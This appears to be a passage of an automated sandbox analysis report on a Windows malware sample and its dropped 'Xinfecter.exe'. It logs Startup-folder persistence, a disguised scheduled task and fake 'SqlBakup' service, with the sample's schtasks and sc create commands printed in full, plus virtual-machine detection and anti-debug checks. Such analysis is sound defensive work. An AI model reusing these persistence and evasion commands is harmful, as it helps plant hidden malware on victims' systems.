        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: 8AbMCL2dxM.exeStatic file information: File size 1260544 > 1048576
        Source: 8AbMCL2dxM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: 8AbMCL2dxM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: 8AbMCL2dxM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: 8AbMCL2dxM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: 8AbMCL2dxM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: 8AbMCL2dxM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: 8AbMCL2dxM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: 8AbMCL2dxM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: 8AbMCL2dxM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: 8AbMCL2dxM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: 8AbMCL2dxM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: 8AbMCL2dxM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: 8AbMCL2dxM.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009508CF LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_009508CF
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009423C6 push ecx; ret 1_2_009423D9
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00941D57 push ecx; ret 1_2_00941D6A
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A23C6 push ecx; ret 42_2_002A23D9
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A1D57 push ecx; ret 42_2_002A1D6A

        Persistence and Installation Behavior

        barindex
        Sample is not signed and drops a device driver
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Windows\SysMain.sysJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\N-Save.sysJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to dropped file

        Boot Survival

        barindex
        Drops PE files to the startup folder
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to dropped file
        Uses schtasks.exe or at.exe to add and modify task schedules
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /f
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATAJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe\:Zone.Identifier:$DATAJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto

        Hooking and other Techniques for Hiding and Protection

        barindex
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 3586
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0092A108 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_0092A108
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeAPI coverage: 8.4 %
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeAPI coverage: 2.3 %
        Source: C:\Windows\SysWOW64\timeout.exe TID: 5820Thread sleep count: 123 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 6276Thread sleep count: 131 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 4916Thread sleep count: 130 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 4492Thread sleep count: 132 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 6520Thread sleep count: 128 > 30
        Source: C:\Windows\SysWOW64\timeout.exe TID: 4784Thread sleep count: 132 > 30
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\sc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\SysWOW64\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeFile Volume queried: \Device\CdRom0\ FullSizeInformationJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CA2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,1_2_008CA2AA
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0097C26B FindFirstFileExA,1_2_0097C26B
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C8A30 SetErrorMode,FindFirstFileW,1_2_008C8A30
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008C8B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,1_2_008C8B70
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CB740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,1_2_008CB740
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002DC26B FindFirstFileExA,42_2_002DC26B
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022A2AA lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,SetErrorMode,FindFirstFileW,42_2_0022A2AA
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00228A30 SetErrorMode,FindFirstFileW,42_2_00228A30
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_00228B70 SetErrorMode,FindFirstFileW,SetErrorMode,FindFirstFileW,42_2_00228B70
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_0022B740 SetErrorMode,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,std::ios_base::_Ios_base_dtor,FindNextFileW,FindClose,42_2_0022B740
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008CE140 GetLogicalDriveStringsA,1_2_008CE140
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWV
        Source: wscript.exe, 0000000E.00000003.2285859130.0000000002D57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
        Source: wscript.exe, 0000000E.00000003.2285859130.0000000002D57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y83
        Source: 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, 8AbMCL2dxM.exe, 00000001.00000002.3512152926.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: wscript.exe, 00000023.00000002.2327132615.0000025DC47DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yG
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0094216A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0094216A
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009508CF LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_009508CF
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00961689 mov eax, dword ptr fs:[00000030h]1_2_00961689
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002C1689 mov eax, dword ptr fs:[00000030h]42_2_002C1689
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_008EE290 GetProcessHeap,HeapFree,1_2_008EE290
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_0094216A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0094216A
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_009422CC SetUnhandledExceptionFilter,1_2_009422CC
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00965768 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00965768
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeCode function: 1_2_00941F6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00941F6D
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A216A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_002A216A
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A22CC SetUnhandledExceptionFilter,42_2_002A22CC
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002C5768 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_002C5768
        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exeCode function: 42_2_002A1F6D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_002A1F6D
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.batJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /fJump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo %date%-%time%Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"Jump to behavior
        Source: C:\Users\user\Desktop\8AbMCL2dxM.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c verJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /v /fo csvJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /i "dcdcf"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create SqlBakup binPath= "C:\Documents and Settings\user\Start Menu\Programs\Startup\Xinfecter.exe" start= autoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\S-6748.bat" "Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\user\AppData\S-2153.bat'" /fJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /i "os name"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /vJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /C echo C:\Users\user\AppData\S-6748.batJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I /c "dcdcf" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 15 /nobreakJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /fi "ImageName eq 8AbMCL2dxM.exe" /fo csv Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\find.exe find /I "8AbMCL2dxM.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\S-8459.vbs" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
